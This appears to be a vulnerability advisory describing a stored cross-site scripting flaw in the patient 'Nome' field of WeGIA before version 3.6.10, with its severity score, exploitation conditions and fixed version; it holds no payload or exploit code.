WeGIA is a web manager for charitable institutions that stores patient information. In versions earlier than 3.6.10 the application accepts user input for the “Nome” (Name) field in the patient information page without proper sanitization. An authenticated user can therefore inject a malicious JavaScript payload that is persisted in the database and executed automatically when the patient record is viewed by any user. This stored cross‑site scripting flaw can allow the injected script to run in the context of the victim’s browser, potentially affecting data integrity or exposing sensitive information to the attacker.

The flaw exists in all releases of WeGIA distributed by LabRedesCefetRJ that precede version 3.6.10. Any deployment that has not applied the 3.6.10 update remains vulnerable. Versions 3.6.10 and later contain the fix that removes the insecure input handling for the Nome field.

The CVSS score of 6.8 classifies this vulnerability as moderate severity. EPSS is not available at the present time, and the vulnerability is not listed in the CISA KEV catalog. Exploitation requires a legitimate user account with permission to edit patient records; once a malicious payload is stored, it will execute for every user who views the affected patient data. Consequently the attack surface is limited to authenticated users with editing privileges, but the impact spreads to any viewer of the record.